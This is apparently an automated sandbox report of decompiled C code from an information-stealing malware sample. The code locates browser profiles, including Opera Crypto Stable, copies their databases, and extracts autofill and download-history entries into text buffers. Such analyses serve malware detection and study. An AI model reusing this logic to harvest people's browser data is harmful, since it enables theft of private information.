				_t60 = GetFileAttributesA( &_v280);
				if(_t60 != 0xffffffff && (_t60 & 0x00000010) == 0) {
					E29D936D0();
					if(E29D9F960(__ebx, __edi) != 0) {
						_t87 =  *((intOrPtr*)(__edi + 0x20));
						E29D9B960(__edi, 0x29dcd617,  &_v544, __ebx,  *((intOrPtr*)(__edi + 0x20)), _v1548);
					}
					_t76 =  *0x29dd833c; // 0x0
					_t60 = FreeLibrary(_t76);
				}
				return E29DADF46(_t60, _t66, _v12 ^ _t90, _t87, _t88, _t89);
			}












                                        0x29d9fb10
                                        0x29d9fb10
                                        0x29d9fb10
                                        0x29d9fb19
                                        0x29d9fb20
                                        0x29d9fb34
                                        0x29d9fb3a
                                        0x29d9fb50
                                        0x29d9fb66
                                        0x29d9fb9b
                                        0x29d9fba9
                                        0x29d9fbbd
                                        0x29d9fbcf
                                        0x29d9fbe1
                                        0x29d9fbf3
                                        0x29d9fc05
                                        0x29d9fc17
                                        0x29d9fc29
                                        0x29d9fc3b
                                        0x29d9fc4d
                                        0x29d9fc5f
                                        0x29d9fc6a
                                        0x29d9fc71
                                        0x29d9fc7e
                                        0x29d9fc87
                                        0x29d9fc8d
                                        0x29d9fc99
                                        0x29d9fca1
                                        0x29d9fcb5
                                        0x29d9fcb5
                                        0x29d9fcba
                                        0x29d9fcc1
                                        0x29d9fcc1
                                        0x29d9fcd4

                                        APIs
                                        • _memset.LIBCMT ref: 29D9FB3A
                                        • _memset.LIBCMT ref: 29D9FB50
                                        • _memset.LIBCMT ref: 29D9FB66
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D9FB7D
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9FB9B
                                        • lstrcatA.KERNEL32(?,01596F20), ref: 29D9FBA9
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9FBBD
                                        • lstrcatA.KERNEL32(?,..\), ref: 29D9FBCF
                                        • lstrcatA.KERNEL32(?,29DD04D8), ref: 29D9FBE1
                                        • lstrcatA.KERNEL32(?,29DD04DC), ref: 29D9FBF3
                                        • lstrcatA.KERNEL32(?,29DD04E0), ref: 29D9FC05
                                        • lstrcatA.KERNEL32(?,29DD04E4), ref: 29D9FC17
                                        • lstrcatA.KERNEL32(?,29DD04E8), ref: 29D9FC29
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9FC3B
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D9FC4D
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D9FC5F
                                        • lstrcatA.KERNEL32(?,.ini), ref: 29D9FC71
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9FC7E
                                          • Part of subcall function 29D936D0: GetProcessHeap.KERNEL32(00000000,?), ref: 29D937B4
                                          • Part of subcall function 29D936D0: HeapAlloc.KERNEL32(00000000), ref: 29D937BB
                                          • Part of subcall function 29D936D0: GetProcessHeap.KERNEL32(00000000,?), ref: 29D9385A
                                          • Part of subcall function 29D936D0: HeapAlloc.KERNEL32(00000000), ref: 29D93861
                                          • Part of subcall function 29D9F960: GetEnvironmentVariableA.KERNEL32(PATH,29DD9030,0000FFFF,01596F20,?,29D9FC97), ref: 29D9F995
                                          • Part of subcall function 29D9F960: _memset.LIBCMT ref: 29D9F9A9
                                          • Part of subcall function 29D9F960: lstrcatA.KERNEL32(?,29DD9030,?,?,29D9FC97), ref: 29D9F9BD
                                          • Part of subcall function 29D9F960: lstrcatA.KERNEL32(?,29DCFA80,?,?,29D9FC97), ref: 29D9F9CF
                                          • Part of subcall function 29D9F960: lstrcatA.KERNEL32(?,015A1F98,?,?,29D9FC97), ref: 29D9F9DD
                                          • Part of subcall function 29D9F960: SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,29D9FC97), ref: 29D9F9EF
                                          • Part of subcall function 29D9F960: _memset.LIBCMT ref: 29D9FA03
                                          • Part of subcall function 29D9F960: LoadLibraryA.KERNEL32(0159C9F0,?,?,?,?,?,29D9FC97), ref: 29D9FA11
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A2670), ref: 29D9FA2C
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A24F0), ref: 29D9FA44
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,0159C6D0), ref: 29D9FA5D
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A26B8), ref: 29D9FA75
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,0159C770), ref: 29D9FA8D
                                          • Part of subcall function 29D9F960: GetProcAddress.KERNEL32(00000000,015A2400), ref: 29D9FAA6
                                        • FreeLibrary.KERNEL32(00000000), ref: 29D9FCC1
                                          • Part of subcall function 29D9B960: wsprintfA.USER32 ref: 29D9B9B2
                                          • Part of subcall function 29D9B960: FindFirstFileA.KERNEL32(?,?), ref: 29D9B9C9
                                          • Part of subcall function 29D9B960: StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9B9EC
                                          • Part of subcall function 29D9B960: StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9BA06
                                          • Part of subcall function 29D9B960: wsprintfA.USER32 ref: 29D9BA2E
                                          • Part of subcall function 29D9B960: StrCmpCA.SHLWAPI(?,015A4C58), ref: 29D9BA45
                                          • Part of subcall function 29D9B960: FindNextFileA.KERNEL32(?,?), ref: 29D9BB7C
                                          • Part of subcall function 29D9B960: FindClose.KERNEL32(?), ref: 29D9BB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$AddressProc$_memset$Heap$FileFind$AllocEnvironmentLibraryProcessVariablewsprintf$AttributesCloseFirstFolderFreeLoadNextPath
                                        • String ID: ..\$.ini
                                        • API String ID: 2842863029-2443844595
                                        • Opcode ID: 1dc79f19cab0877b01861707182f978eab39796a06442861f6606a6a1025fe1e
                                        • Instruction ID: 4210c822ebb0fa333a936c53b079b54a8684979f548ee9736d586b32f35e6b0d
                                        • Opcode Fuzzy Hash: 1dc79f19cab0877b01861707182f978eab39796a06442861f6606a6a1025fe1e
                                        • Instruction Fuzzy Hash: 084145B394115C6BD715EBA0DC89FEDB339AB58B00F40859CF70596040EA789A45AF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9F5A0 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 264stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E29D9F5A0(CHAR* __ecx, CHAR* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				signed int _v24;
				char _v288;
				char _v552;
				char _v816;
				void* _v1816;
				intOrPtr _v1824;
				char _v1828;
				char _v1844;
				intOrPtr _v1852;
				char _v1856;
				short _v1872;
				char _v1876;
				char _v1880;
				short _v1884;
				CHAR* _v1888;
				intOrPtr _v1892;
				CHAR* _v1896;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t87;
				signed int _t88;
				intOrPtr _t103;
				CHAR* _t119;
				intOrPtr* _t121;
				WCHAR* _t126;
				signed char _t127;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				void* _t145;
				char _t146;
				void* _t147;
				intOrPtr _t154;
				intOrPtr _t160;
				void* _t180;
				void* _t186;
				CHAR* _t187;
				intOrPtr _t189;
				void* _t190;
				void* _t191;
				CHAR* _t192;
				intOrPtr _t193;
				void* _t195;
				signed int _t196;
				void* _t197;
				void* _t201;
				void* _t203;

				_t87 =  *0x29dd5664; // 0xd9555f04
				_t88 = _t87 ^ _t196;
				_v24 = _t88;
				 *[fs:0x0] =  &_v16;
				_t192 = _a8;
				_t187 =  *0x29dd8068; // 0x15a2ef8
				_t146 = 0;
				_v1892 = _a4;
				_v1888 = __ecx;
				_v1896 = __edx;
				_v1876 = 0;
				_v1880 = 0;
				E29DB5640( &_v552, 0, 0x104);
				E29DB5640( &_v816, 0, 0x104);
				E29DB5640( &_v1816, 0, 0x3e8);
				_t201 = _t197 - 0x758 + 0x24;
				_t17 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v1816, _t88, _t186, _t191, _t145,  *[fs:0x0], E29DC41AB, 0xffffffff) < 0x00000000) - 1; // -1
				lstrcatA( &_v552, _t17 &  &_v1816);
				lstrcatA( &_v552, _t187);
				lstrcatA( &_v552, _t192);
				_t103 =  *0x29dd80a0; // 0x15a4b08
				_push(_t103);
				_push(_t192);
				_v1884 = 0;
				if( *0x29dd8550() == 0) {
					_v1884 = 1;
				}
				_t154 =  *0x29dd7b00; // 0x15a2cf8
				_push(_t154);
				_push(_t192);
				if( *0x29dd8550() == 0) {
					_v1884 = 2;
				}
				_push("Opera Crypto Stable");
				_push(_t192);
				if( *0x29dd8550() == 0) {
					_v1884 = 3;
				}
				E29DB5640( &_v1816, _t146, 0x3e8);
				_t30 = (0 |  *0x29dd8500(_t146, 0x1a, _t146, _t146,  &_v1816) < 0x00000000) - 1; // -1
				lstrcatA( &_v816, _t30 &  &_v1816);
				lstrcatA( &_v816, _t187);
				E29DB5640( &_v288, _t146, 0x104);
				_t203 = _t201 + 0x18;
				lstrcatA( &_v288,  &_v552);
				lstrcatA( &_v288, "\\");
				_t119 =  *0x29dd7d54; // 0x15a1fe0
				lstrcatA( &_v288, _t119);
				_t121 =  &_v288;
				_v1824 = 0xf;
				_v1828 = _t146;
				_v1844 = _t146;
				_t180 = _t121 + 1;
				do {
					_t160 =  *_t121;
					_t121 = _t121 + 1;
				} while (_t160 != _t146);
				E29D892C0( &_v1844,  &_v288, _t121 - _t180);
				_v8 = _t146;
				_t126 = E29DA4990( &_v1844,  &_v1844,  &_v1872);
				if(_t126[0xa] >= 8) {
					_t126 =  *_t126;
				}
				_t127 = GetFileAttributesW(_t126);
				if(_t127 == 0xffffffff || (_t127 & 0x00000010) != 0) {
					_t193 = 0;
				} else {
					_t193 = 1;
				}
				if(_v1852 >= 8) {
					_push(_v1872);
					E29DADF3B();
					_t203 = _t203 + 4;
				}
				_v8 = 0xffffffff;
				_v1852 = 7;
				_v1856 = _t146;
				_v1872 = 0;
				if(_v1824 >= 0x10) {
					_push(_v1844);
					E29DADF3B();
					_t203 = _t203 + 4;
				}
				_v1824 = 0xf;
				_v1828 = _t146;
				_v1844 = _t146;
				if(_t193 != _t146 && E29D99300( &_v1876,  &_v1880,  &_v288) == 0) {
					_t138 = _v1876;
					if(_t138 != _t146) {
						 *0x29dd8464(_t138, _t146);
						_v1876 = _t146;
					}
					_t139 = _v1880;
					if(_t139 != _t146) {
						 *0x29dd8518(_t139);
					}
					_v1876 = _t146;
					_v1880 = _t146;
				}
				_t189 = _v1892;
				_t194 = _v1888;
				_t184 = _v1880;
				E29D9B520(_t189, 0x29dcd617,  &_v552, _v1888, _v1876, _v1880,  *((intOrPtr*)(_t189 + 0x20)), _v1896, _a12);
				if( *((intOrPtr*)(_t189 + 6)) != _t146) {
					_t184 = _v1884;
					E29D9E9B0( &_v816, _t194, _t189, _v1884);
					_t146 = 0;
				}
				_t131 = _v1876;
				if(_t131 != _t146) {
					 *0x29dd8464(_t131, _t146);
					_v1876 = _t146;
				}
				_t132 = _v1880;
				if(_t132 != _t146) {
					_t132 =  *0x29dd8518(_t132);
				}
				 *[fs:0x0] = _v16;
				_pop(_t190);
				_pop(_t195);
				_pop(_t147);
				return E29DADF46(_t132, _t147, _v24 ^ _t196, _t184, _t190, _t195);
			}






















































                                        0x29d9f5b7
                                        0x29d9f5bc
                                        0x29d9f5be
                                        0x29d9f5c8
                                        0x29d9f5d1
                                        0x29d9f5d4
                                        0x29d9f5da
                                        0x29d9f5e1
                                        0x29d9f5ef
                                        0x29d9f5f5
                                        0x29d9f5fb
                                        0x29d9f601
                                        0x29d9f607
                                        0x29d9f61c
                                        0x29d9f631
                                        0x29d9f636
                                        0x29d9f658
                                        0x29d9f665
                                        0x29d9f673
                                        0x29d9f681
                                        0x29d9f687
                                        0x29d9f68c
                                        0x29d9f68d
                                        0x29d9f68e
                                        0x29d9f69c
                                        0x29d9f69e
                                        0x29d9f69e
                                        0x29d9f6a8
                                        0x29d9f6ae
                                        0x29d9f6af
                                        0x29d9f6b8
                                        0x29d9f6ba
                                        0x29d9f6ba
                                        0x29d9f6c4
                                        0x29d9f6c9
                                        0x29d9f6d2
                                        0x29d9f6d4
                                        0x29d9f6d4
                                        0x29d9f6eb
                                        0x29d9f712
                                        0x29d9f71f
                                        0x29d9f72d
                                        0x29d9f740
                                        0x29d9f745
                                        0x29d9f756
                                        0x29d9f768
                                        0x29d9f76e
                                        0x29d9f77b
                                        0x29d9f781
                                        0x29d9f787
                                        0x29d9f791
                                        0x29d9f797
                                        0x29d9f79d
                                        0x29d9f7a0
                                        0x29d9f7a0
                                        0x29d9f7a2
                                        0x29d9f7a3
                                        0x29d9f7b7
                                        0x29d9f7c9
                                        0x29d9f7cc
                                        0x29d9f7d9
                                        0x29d9f7db
                                        0x29d9f7db
                                        0x29d9f7de
                                        0x29d9f7e7
                                        0x29d9f7f4
                                        0x29d9f7ed
                                        0x29d9f7ed
                                        0x29d9f7ed
                                        0x29d9f7fc
                                        0x29d9f804
                                        0x29d9f805
                                        0x29d9f80a
                                        0x29d9f80a
                                        0x29d9f80f
                                        0x29d9f81d
                                        0x29d9f827
                                        0x29d9f82d
                                        0x29d9f834
                                        0x29d9f83c
                                        0x29d9f83d
                                        0x29d9f842
                                        0x29d9f842
                                        0x29d9f845
                                        0x29d9f84f
                                        0x29d9f855
                                        0x29d9f85d
                                        0x29d9f87e
                                        0x29d9f886
                                        0x29d9f88a
                                        0x29d9f890
                                        0x29d9f890
                                        0x29d9f896
                                        0x29d9f89e
                                        0x29d9f8a1
                                        0x29d9f8a1
                                        0x29d9f8a7
                                        0x29d9f8ad
                                        0x29d9f8ad
                                        0x29d9f8bc
                                        0x29d9f8c5
                                        0x29d9f8cc
                                        0x29d9f8eb
                                        0x29d9f8f3
                                        0x29d9f8f5
                                        0x29d9f905
                                        0x29d9f90a
                                        0x29d9f90a
                                        0x29d9f90c
                                        0x29d9f914
                                        0x29d9f918
                                        0x29d9f91e
                                        0x29d9f91e
                                        0x29d9f924
                                        0x29d9f92c
                                        0x29d9f92f
                                        0x29d9f92f
                                        0x29d9f938
                                        0x29d9f940
                                        0x29d9f941
                                        0x29d9f942
                                        0x29d9f950

                                        APIs
                                        • _memset.LIBCMT ref: 29D9F607
                                        • _memset.LIBCMT ref: 29D9F61C
                                        • _memset.LIBCMT ref: 29D9F631
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F645
                                        • lstrcatA.KERNEL32(?,-00000001,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F665
                                        • lstrcatA.KERNEL32(?,015A2EF8,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F673
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F681
                                        • StrCmpCA.SHLWAPI(00000000,015A4B08,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F694
                                        • StrCmpCA.SHLWAPI(00000000,015A2CF8,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F6B0
                                        • StrCmpCA.SHLWAPI(00000000,Opera Crypto Stable,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F6CA
                                        • _memset.LIBCMT ref: 29D9F6EB
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F6FF
                                        • lstrcatA.KERNEL32(?,-00000001,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F71F
                                        • lstrcatA.KERNEL32(?,015A2EF8,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9F72D
                                        • _memset.LIBCMT ref: 29D9F740
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F756
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F768
                                        • lstrcatA.KERNEL32(?,015A1FE0,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9F77B
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 29D9F7DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$FolderPath$AttributesFile
                                        • String ID: Opera Crypto Stable
                                        • API String ID: 375595732-2665741402
                                        • Opcode ID: 343e72ff9d87fba3cfc21dd24899ab62f9086de5d64d1768a4e9775c48e9e7bd
                                        • Instruction ID: 1d39b09ce1d5c769577430679a1826c3012246377c03039a7362b4e476fa5960
                                        • Opcode Fuzzy Hash: 343e72ff9d87fba3cfc21dd24899ab62f9086de5d64d1768a4e9775c48e9e7bd
                                        • Instruction Fuzzy Hash: 35A15FB2D04258AFDB15EF64DC84BDAB7B8EB58700F0081E9E50DA7140D778AE85DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9B2C0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 172stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E29D9B2C0(intOrPtr __ecx, intOrPtr* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t44;
				void* _t54;
				long _t57;
				void* _t64;
				int _t65;
				CHAR* _t67;
				CHAR* _t68;
				void* _t74;
				CHAR* _t77;
				intOrPtr* _t85;
				void* _t99;
				void* _t101;
				CHAR* _t102;
				CHAR* _t103;
				signed int _t104;
				void* _t105;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t115;

				_t115 = __eflags;
				_t35 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t35 ^ _t104;
				_t75 = _a4;
				_v556 = _a8;
				_v552 = __ecx;
				_v560 = __edx;
				E29DB5640( &_v276, 0, 0x104);
				_t77 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v276, _t77);
				_t102 = E29DADFE0( &_v276, _t99, _t101, 0x1a);
				 *_t102 = 0;
				E29DAFCE4(GetTickCount());
				_t108 = _t105 + 0x14;
				_t100 = 0x1a;
				do {
					_t44 = E29DAFCF6(_t115);
					asm("cdq");
					_push(_t44 % 0xa);
					_push(_t102);
					wsprintfA(_t102, "%s%d");
					_t108 = _t108 + 0x10;
					_t100 = _t100 - 1;
				} while (_t100 != 0);
				_t102[0x1a] = 0;
				lstrcatA( &_v276, _t102);
				CopyFileA(_t75,  &_v276, 1);
				E29DB5640( &_v540, _t100, 0x104);
				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v552, _v556);
				_t103 =  *0x29dd7aa8; // 0x1598ea8
				_t54 =  *0x29dd8344( &_v276,  &_v548);
				_t110 = _t108 + 0x24;
				if(_t54 != 0) {
					L12:
					return E29DADF46(DeleteFileA( &_v276), _t75, _v8 ^ _t104,  &_v276, _t100, _t103);
				}
				_t57 =  *0x29dd82f8(_v548, _t103, 0xffffffff,  &_v544, _t54);
				_t111 = _t110 + 0x14;
				if(_t57 != 0) {
					L11:
					 *0x29dd8318(_v544);
					 *0x29dd8348(_v548);
					goto L12;
				}
				_t103 = HeapAlloc(GetProcessHeap(), _t57, 0xf423f);
				_t64 =  *0x29dd8314(_v544);
				_t111 = _t111 + 4;
				if(_t64 != 0x64) {
					L6:
					_t65 = lstrlenA(_t103);
					_t85 = _v560;
					if(_t85 != 0) {
						__eflags =  *_t85 - 2;
						if( *_t85 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t85 + 4)), _t103,  &_v540, _t65, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L11;
				} else {
					goto L5;
				}
				do {
					L5:
					_t67 =  *0x29dd8334(_v544, 0);
					_t100 = _t67;
					_t68 =  *0x29dd8334(_v544, 1);
					_t75 = _t68;
					lstrcatA(_t103, _t67);
					lstrcatA(_t103, "\t");
					lstrcatA(_t103, _t68);
					lstrcatA(_t103, "\n");
					_t74 =  *0x29dd8314(_v544);
					_t111 = _t111 + 0x14;
				} while (_t74 == 0x64);
				goto L6;
			}



































                                        0x29d9b2c0
                                        0x29d9b2c9
                                        0x29d9b2d0
                                        0x29d9b2d7
                                        0x29d9b2e1
                                        0x29d9b2f0
                                        0x29d9b2f6
                                        0x29d9b2fc
                                        0x29d9b301
                                        0x29d9b312
                                        0x29d9b31f
                                        0x29d9b324
                                        0x29d9b32e
                                        0x29d9b333
                                        0x29d9b336
                                        0x29d9b340
                                        0x29d9b340
                                        0x29d9b345
                                        0x29d9b34d
                                        0x29d9b34e
                                        0x29d9b355
                                        0x29d9b35b
                                        0x29d9b35e
                                        0x29d9b35e
                                        0x29d9b369
                                        0x29d9b36d
                                        0x29d9b37d
                                        0x29d9b390
                                        0x29d9b3b2
                                        0x29d9b3b8
                                        0x29d9b3cc
                                        0x29d9b3d2
                                        0x29d9b3d7
                                        0x29d9b4f3
                                        0x29d9b510
                                        0x29d9b510
                                        0x29d9b3ef
                                        0x29d9b3f5
                                        0x29d9b3fa
                                        0x29d9b4d3
                                        0x29d9b4da
                                        0x29d9b4ea
                                        0x00000000
                                        0x29d9b4f0
                                        0x29d9b413
                                        0x29d9b41c
                                        0x29d9b422
                                        0x29d9b428
                                        0x29d9b48c
                                        0x29d9b48d
                                        0x29d9b493
                                        0x29d9b49b
                                        0x29d9b4a9
                                        0x29d9b4ac
                                        0x29d9b4ce
                                        0x29d9b4ae
                                        0x29d9b4ae
                                        0x29d9b4ae
                                        0x29d9b49d
                                        0x29d9b49d
                                        0x29d9b49d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9b42a
                                        0x29d9b42a
                                        0x29d9b433
                                        0x29d9b442
                                        0x29d9b444
                                        0x29d9b44f
                                        0x29d9b451
                                        0x29d9b45d
                                        0x29d9b465
                                        0x29d9b471
                                        0x29d9b47e
                                        0x29d9b484
                                        0x29d9b487
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D9B2FC
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,29DCD617), ref: 29D9B312
                                        • _malloc.LIBCMT ref: 29D9B31A
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9B327
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9B340
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9B355
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9B36D
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9B37D
                                        • _memset.LIBCMT ref: 29D9B390
                                        • wsprintfA.USER32 ref: 29D9B3B2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9B406
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9B40D
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9B451
                                        • lstrcatA.KERNEL32(00000000,29DCFF24), ref: 29D9B45D
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9B465
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9B471
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9B48D
                                        • DeleteFileA.KERNEL32(?), ref: 29D9B4FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\Autofill\%s_%s.txt
                                        • API String ID: 3817689429-429343355
                                        • Opcode ID: 67446b77d2bcec3fa882d08b796599f31e0854ac9c4136cfa13424ba6862faa7
                                        • Instruction ID: 8ad778d891ea841ea2f5a7c9227807180f01ebb7b77771f61fd343a75be49b36
                                        • Opcode Fuzzy Hash: 67446b77d2bcec3fa882d08b796599f31e0854ac9c4136cfa13424ba6862faa7
                                        • Instruction Fuzzy Hash: E651F4B2941258BBD711EBA4EC49FDA7778EF58B05F00819CF50AD7200DA389A45EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9A7B0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 172stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E29D9A7B0(intOrPtr __ecx, intOrPtr* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t44;
				void* _t54;
				long _t57;
				void* _t64;
				int _t65;
				CHAR* _t67;
				CHAR* _t68;
				void* _t74;
				CHAR* _t77;
				intOrPtr* _t85;
				void* _t99;
				void* _t101;
				CHAR* _t102;
				CHAR* _t103;
				signed int _t104;
				void* _t105;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t115;

				_t115 = __eflags;
				_t35 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t35 ^ _t104;
				_t75 = _a4;
				_v556 = _a8;
				_v552 = __ecx;
				_v560 = __edx;
				E29DB5640( &_v276, 0, 0x104);
				_t77 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v276, _t77);
				_t102 = E29DADFE0( &_v276, _t99, _t101, 0x1a);
				 *_t102 = 0;
				E29DAFCE4(GetTickCount());
				_t108 = _t105 + 0x14;
				_t100 = 0x1a;
				do {
					_t44 = E29DAFCF6(_t115);
					asm("cdq");
					_push(_t44 % 0xa);
					_push(_t102);
					wsprintfA(_t102, "%s%d");
					_t108 = _t108 + 0x10;
					_t100 = _t100 - 1;
				} while (_t100 != 0);
				_t102[0x1a] = 0;
				lstrcatA( &_v276, _t102);
				CopyFileA(_t75,  &_v276, 1);
				E29DB5640( &_v540, _t100, 0x104);
				wsprintfA( &_v540, "\\Downloads\\%s_%s.txt", _v552, _v556);
				_t103 =  *0x29dd8280; // 0x15991f0
				_t54 =  *0x29dd8344( &_v276,  &_v548);
				_t110 = _t108 + 0x24;
				if(_t54 != 0) {
					L12:
					return E29DADF46(DeleteFileA( &_v276), _t75, _v8 ^ _t104,  &_v276, _t100, _t103);
				}
				_t57 =  *0x29dd82f8(_v548, _t103, 0xffffffff,  &_v544, _t54);
				_t111 = _t110 + 0x14;
				if(_t57 != 0) {
					L11:
					 *0x29dd8318(_v544);
					 *0x29dd8348(_v548);
					goto L12;
				}
				_t103 = HeapAlloc(GetProcessHeap(), _t57, 0xf423f);
				_t64 =  *0x29dd8314(_v544);
				_t111 = _t111 + 4;
				if(_t64 != 0x64) {
					L6:
					_t65 = lstrlenA(_t103);
					_t85 = _v560;
					if(_t85 != 0) {
						__eflags =  *_t85 - 2;
						if( *_t85 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t85 + 4)), _t103,  &_v540, _t65, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L11;
				} else {
					goto L5;
				}
				do {
					L5:
					_t67 =  *0x29dd8334(_v544, 0);
					_t100 = _t67;
					_t68 =  *0x29dd8334(_v544, 1);
					_t75 = _t68;
					lstrcatA(_t103, _t67);
					lstrcatA(_t103, "\n");
					lstrcatA(_t103, _t68);
					lstrcatA(_t103, "\n\n");
					_t74 =  *0x29dd8314(_v544);
					_t111 = _t111 + 0x14;
				} while (_t74 == 0x64);
				goto L6;
			}



































                                        0x29d9a7b0
                                        0x29d9a7b9
                                        0x29d9a7c0
                                        0x29d9a7c7
                                        0x29d9a7d1
                                        0x29d9a7e0
                                        0x29d9a7e6
                                        0x29d9a7ec
                                        0x29d9a7f1
                                        0x29d9a802
                                        0x29d9a80f
                                        0x29d9a814
                                        0x29d9a81e
                                        0x29d9a823
                                        0x29d9a826
                                        0x29d9a830
                                        0x29d9a830
                                        0x29d9a835
                                        0x29d9a83d
                                        0x29d9a83e
                                        0x29d9a845
                                        0x29d9a84b
                                        0x29d9a84e
                                        0x29d9a84e
                                        0x29d9a859
                                        0x29d9a85d
